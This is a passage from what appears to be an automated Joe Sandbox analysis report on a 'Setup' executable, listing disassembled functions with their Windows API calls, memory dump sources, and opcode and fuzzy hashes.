                                                                                              • Instruction ID: 58b4b7a61d7df3a96e4f80091475ef8aab54548668322f23a67f5f92475cc376
                                                                                              • Opcode Fuzzy Hash: 768dd9c18f098967cd32ae7b50fa61dbe693b9b78e99788e7a0b22cf571e5b1a
                                                                                              • Instruction Fuzzy Hash: 2421A031501704AFDF22CF14C584A8EBBF9EF4AB90F18451AF89697262D331E990CF95
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Parent
                                                                                              • String ID:
                                                                                              • API String ID: 975332729-0
                                                                                              • Opcode ID: 5d59158ae0a9fe8097e63ecf1a13a16277e82b3a1afb3068eee088f1bc2faa79
                                                                                              • Instruction ID: 52539763d443ab84f74eb5e106c3e3dc09d6f20bac534f21d15184237edc5422
                                                                                              • Opcode Fuzzy Hash: 5d59158ae0a9fe8097e63ecf1a13a16277e82b3a1afb3068eee088f1bc2faa79
                                                                                              • Instruction Fuzzy Hash: ED118B312556129FFB049B78C988A2973FDEB9BB66F140939E056C72A1DB30E841CF61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E2088
                                                                                                • Part of subcall function 6C9178C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C90139B,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498,?,?,?), ref: 6C9178D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionH_prolog3Raise
                                                                                              • String ID:
                                                                                              • API String ID: 741760457-0
                                                                                              • Opcode ID: 898f6d4579c431034ab12709ee1b75226a8e6eb10c5d16646b221351c3e92736
                                                                                              • Instruction ID: 3944dcfd171d814ecba4c451095ec793c439115b28c4d74fe357c3167a87e877
                                                                                              • Opcode Fuzzy Hash: 898f6d4579c431034ab12709ee1b75226a8e6eb10c5d16646b221351c3e92736
                                                                                              • Instruction Fuzzy Hash: 132158B0A0060ACFCB08CF18C6948A9FBF1FF59300725C8ADD4599BB61D730E954CB90
                                                                                              APIs
                                                                                                • Part of subcall function 6C9066E5: __EH_prolog3.LIBCMT ref: 6C9066EC
                                                                                                • Part of subcall function 6C9066E5: GetCommandLineW.KERNEL32(00000024,6C9036CF,00000000,?,?,?,?,6C901338,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498), ref: 6C9066F3
                                                                                                • Part of subcall function 6C9066E5: GetUserDefaultUILanguage.KERNEL32(00000738,00000000,00000000,?,?,?,6C901338,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498,?), ref: 6C90672F
                                                                                                • Part of subcall function 6C906782: __EH_prolog3.LIBCMT ref: 6C906789
                                                                                                • Part of subcall function 6C906782: CoInitialize.OLE32(00000000), ref: 6C9067DD
                                                                                                • Part of subcall function 6C906782: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,6C8FFA6E,?,?,?,UiInfo.xml,?,00000000,00000044,6C9036D8,02F92298,?,00000000), ref: 6C9067FB
                                                                                              • GetUserDefaultUILanguage.KERNEL32(02F92298,?,00000000,?,?,?,?,6C901338,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498), ref: 6C9036D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultH_prolog3LanguageUser$CommandCreateInitializeInstanceLine
                                                                                              • String ID:
                                                                                              • API String ID: 4049621043-0
                                                                                              • Opcode ID: 0b5211aac069e9f210dd7c039539ec80c7aa87e37ca659f123965cfeb57c1f00
                                                                                              • Instruction ID: f874de9a65ced639959aec223f269cc4d0e1d51c03fb2e04dc473309e721eb20
                                                                                              • Opcode Fuzzy Hash: 0b5211aac069e9f210dd7c039539ec80c7aa87e37ca659f123965cfeb57c1f00
                                                                                              • Instruction Fuzzy Hash: F101C8713016419FE7208A7AC8C0C5A7799EF55679B20833DE5B587BD0E730D8058B51
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6395BC91
                                                                                                • Part of subcall function 6394E7D4: GetThreadLocale.KERNEL32(?,?,6394EB27), ref: 6394E7DE
                                                                                                • Part of subcall function 6394E7D4: GetThreadLocale.KERNEL32(?,?,6394EB27), ref: 6394E7ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2581572359-0
                                                                                              • Opcode ID: b40ed748ecf6813deb73cef3207f75947531f8993c4a4f9be1094c16e4d5680c
                                                                                              • Instruction ID: f8d611e3a2c54e1892f963b2f50246f9da11514a423d5dcc78140296ed60b66e
                                                                                              • Opcode Fuzzy Hash: b40ed748ecf6813deb73cef3207f75947531f8993c4a4f9be1094c16e4d5680c
                                                                                              • Instruction Fuzzy Hash: 7B01C0316042049BCB20DF29C944A6A77FCFF42B78B55C029F8199B261DF30E891CF99
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch
                                                                                              • String ID:
                                                                                              • API String ID: 3886170330-0
                                                                                              • Opcode ID: 03901dcb28a4ca2e0719defebea893da677f2b33a13274f9e52390936dd5a80b
                                                                                              • Instruction ID: 4daa097063a6a8fd08a9be39887ee3358fcfe91739d04f9bcf784fa428e163d2
                                                                                              • Opcode Fuzzy Hash: 03901dcb28a4ca2e0719defebea893da677f2b33a13274f9e52390936dd5a80b
                                                                                              • Instruction Fuzzy Hash: 2511707610490A8FCB31DF68C58198EB3B5BF94318B164E55D065E7A54CB30F9498B91
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: _memcpy_s
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,00000000,?,00000000,00000000), ref: 639569B3
                                                                                                • Part of subcall function 63967F08: GetLastError.KERNEL32(63967B0B,?,?,?,00000000), ref: 63967F08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastRead
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00002100,00000002,00000000,63967BC3,C0000000,?,00000000,?,?,63967BC3,?,C0000000,00000000,00000002,00002100,?), ref: 63967F5C
                                                                                                • Part of subcall function 63967E95: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,63967F46,00002100,00000002,00000000,63967BC3,C0000000,?,?,?,63967BC3,?,C0000000,00000000), ref: 63967EA6
                                                                                                • Part of subcall function 63967E95: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 63967EB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AddressCreateFileHandleModuleProc
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,?,?,?,00000000,?,00000000,00000001,?,6C8CA9FA,?,80000000,00000001,00000003,00000080,00000000), ref: 6C8C80D7
                                                                                                • Part of subcall function 6C9189E2: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C8C80C1,?,?,?,?,00000000,?,00000001,?,6C8CA9FA,?,80000000,00000001), ref: 6C9189F3
                                                                                                • Part of subcall function 6C9189E2: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6C918A03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AddressCreateFileHandleModuleProc
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63955085
                                                                                                • Part of subcall function 63952661: __EH_prolog3.LIBCMT ref: 63952668
                                                                                                • Part of subcall function 63952996: __EH_prolog3.LIBCMT ref: 6395299D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: f1334064be3cf5c8d75d4c7a9babe441d146d5d3ec71811a12feab8e556a9f17
                                                                                              • Instruction ID: a8325abbfba4eb6b330bdc97447adb195c73cf6d3bfe77f3bfaf326e12bce550
                                                                                              • Opcode Fuzzy Hash: f1334064be3cf5c8d75d4c7a9babe441d146d5d3ec71811a12feab8e556a9f17
                                                                                              • Instruction Fuzzy Hash: D3F0B4319452499ACF218BB8C6003DD77216F2134DF10805484A43BB95C735D61EE7A0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C7C75
                                                                                                • Part of subcall function 6C8C7CE8: __EH_prolog3.LIBCMT ref: 6C8C7CEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 79015ae607570ada4ef89b89d6975551c8bffcd91b548846ac0f92f8469d9c79
                                                                                              • Instruction ID: ac14ac90644abe4ba610951a932c4dd4918cd7ddcaf6c38a31b8bddeacb82e64
                                                                                              • Opcode Fuzzy Hash: 79015ae607570ada4ef89b89d6975551c8bffcd91b548846ac0f92f8469d9c79
                                                                                              • Instruction Fuzzy Hash: 5AF03674705A079BD74CDF3885513E9F6A1BF58308F41453E901DE7741C731A828CB84
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394B945
                                                                                                • Part of subcall function 6396830D: _vwprintf.LIBCMT ref: 63968353
                                                                                                • Part of subcall function 6396830D: _vswprintf_s.LIBCMT ref: 63968378
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_vswprintf_s_vwprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3682816334-0
                                                                                              • Opcode ID: 3b99a142f24efd931e06515e572760ebc2eeb41671150ead45767456e2dd2063
                                                                                              • Instruction ID: c35aba26e1e1567153c3bf21c7dd2d096d5bc7d4a196fdeb059380e730291a55
                                                                                              • Opcode Fuzzy Hash: 3b99a142f24efd931e06515e572760ebc2eeb41671150ead45767456e2dd2063
                                                                                              • Instruction Fuzzy Hash: 3CF0157062024ADFDF20DFA4C848AAEB7B5BF41B18F408829E555AB291DB30DA15CF51
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 639577CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: ee45da9ae3aa03de5ca18a0ad4e0ed5923ffd7ed12f5ede247075c6f5010cca5
                                                                                              • Instruction ID: 7632248fcc2c971b266f7c1b7b8320ef049047421a49f1835c90bae769b677c1
                                                                                              • Opcode Fuzzy Hash: ee45da9ae3aa03de5ca18a0ad4e0ed5923ffd7ed12f5ede247075c6f5010cca5
                                                                                              • Instruction Fuzzy Hash: 60E09A306402009FC720DB24EC49F1A7BAABB86B10F104158F5168B1A1CB30E881CE00
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,00000006,?,?,?,?,6394DAC1,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 63967E76
                                                                                                • Part of subcall function 63967F08: GetLastError.KERNEL32(63967B0B,?,?,?,00000000), ref: 63967F08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: cc102b64f771a0c9c8c1f056495475d08c587691fbd83c29bb6e4d3b102b988c
                                                                                              • Instruction ID: a47b869ce03b8abf70d04654666332c115b8ee102e3ce7b1e6a691d090595fe0
                                                                                              • Opcode Fuzzy Hash: cc102b64f771a0c9c8c1f056495475d08c587691fbd83c29bb6e4d3b102b988c
                                                                                              • Instruction Fuzzy Hash: F8E01A71600248BF9B05DFA5D844D9E7BB9EB4A364B104659F925D32A0EB70EE14DF20
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                                • Part of subcall function 6C918DCD: _vwprintf.LIBCMT ref: 6C918E13
                                                                                                • Part of subcall function 6C918DCD: _vswprintf_s.LIBCMT ref: 6C918E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_vswprintf_s_vwprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3682816334-0
                                                                                              • Opcode ID: 527827e2ae54dabb84e2ef0562fa68b61657ee6955b93a56ff9893472b59c33c
                                                                                              • Instruction ID: 6130cca6e51790a07868bd50827f93d92b112266243bdd1d31f1380664f266ca
                                                                                              • Opcode Fuzzy Hash: 527827e2ae54dabb84e2ef0562fa68b61657ee6955b93a56ff9893472b59c33c
                                                                                              • Instruction Fuzzy Hash: 79F01C3062024ADFDF00DFA4C849AEEB7B6FF50318F048815E4509BB50CB34D919DB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5beade4c2493959faf4449c78c43680f33a13fb73acf94ce3392477ead92495
                                                                                              • Instruction ID: 44823a7abf8dc0305779502f361466f9d85a6ae0ec6f8fb4dbcba68d9c422b6a
                                                                                              • Opcode Fuzzy Hash: d5beade4c2493959faf4449c78c43680f33a13fb73acf94ce3392477ead92495
                                                                                              • Instruction Fuzzy Hash: 32E0C235114109FF8B019FA5C808C897FBAFF19359714C065F8498A528D736CA54EB81
                                                                                              APIs
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,6C8CAA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C8C8149
                                                                                                • Part of subcall function 6C9189C8: GetLastError.KERNEL32(6C8C80E8,6C8CA9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9189C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 7cbe515f6ee35c3a55642804b8cf3112775bf21c3f3a5e63751bdf98159ad822
                                                                                              • Instruction ID: 9128e6cffe05dca637f1fa7aa6e4de99c5301e792b136bd76d1832cb66d8d7dd
                                                                                              • Opcode Fuzzy Hash: 7cbe515f6ee35c3a55642804b8cf3112775bf21c3f3a5e63751bdf98159ad822
                                                                                              • Instruction Fuzzy Hash: FAE09A71600108BF8B04CFA4C944C8E3BF8EF09364B104A2AF925D3280DB70EA00EB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C3965
                                                                                                • Part of subcall function 6C8F8C24: __EH_prolog3.LIBCMT ref: 6C8F8C2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 8cbc30e87a72e55677796b9bd1e55dd3e2221309323cdd1ceca5d8a10d61d299
                                                                                              • Instruction ID: 6c45d8f5e340573dd8a5def21e6419b811c722b655a9165c88b811cf4978fa3b
                                                                                              • Opcode Fuzzy Hash: 8cbc30e87a72e55677796b9bd1e55dd3e2221309323cdd1ceca5d8a10d61d299
                                                                                              • Instruction Fuzzy Hash: B5F0397151010AEFCB10DFB8C945A9DB762BF20318F208655E1509BB99CB35E928DBA5
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C3924
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 683a3349fe3f35f99b020994a88a6b2042daeb5eb5e502bfda5a5dbc85a4df15
                                                                                              • Instruction ID: a8965bc38c99f69de792fce3055a3c5f200b917095ae6c238cdb9c7e3bd37b5e
                                                                                              • Opcode Fuzzy Hash: 683a3349fe3f35f99b020994a88a6b2042daeb5eb5e502bfda5a5dbc85a4df15
                                                                                              • Instruction Fuzzy Hash: 25E0EE39601219ABCB118F58C940A9EBBA1FF28314F10C409F9699BB60C774EA25EB51
                                                                                              APIs
                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,6C8F60F1), ref: 6C8C810D
                                                                                                • Part of subcall function 6C9189C8: GetLastError.KERNEL32(6C8C80E8,6C8CA9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9189C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastWrite
                                                                                              • String ID:
                                                                                              • API String ID: 442123175-0
                                                                                              • Opcode ID: 088c2b2347b47ee53a62aa85ba9626b1477066117ec88408f3de9dfe01eb4b3b
                                                                                              • Instruction ID: 1140449cd392dbc059effdc0463793134f047aa55fb01a6c02402346821a85a5
                                                                                              • Opcode Fuzzy Hash: 088c2b2347b47ee53a62aa85ba9626b1477066117ec88408f3de9dfe01eb4b3b
                                                                                              • Instruction Fuzzy Hash: B5D0173234420CBFDB108FA2CD05E9A3BADFB55714F004423FA1486910EB32D420DB62
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F8387
                                                                                                • Part of subcall function 6C8F84FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,6C8FFA6E,02F92298,?,?,6C8F83B3,02F92298,6C8BA794,02F92298,6C8BA794,00000000), ref: 6C8F851E
                                                                                                • Part of subcall function 6C8F84FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,6C8FFA6E,02F92298,?,?,6C8F83B3,02F92298,6C8BA794,02F92298,6C8BA794), ref: 6C8F853F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
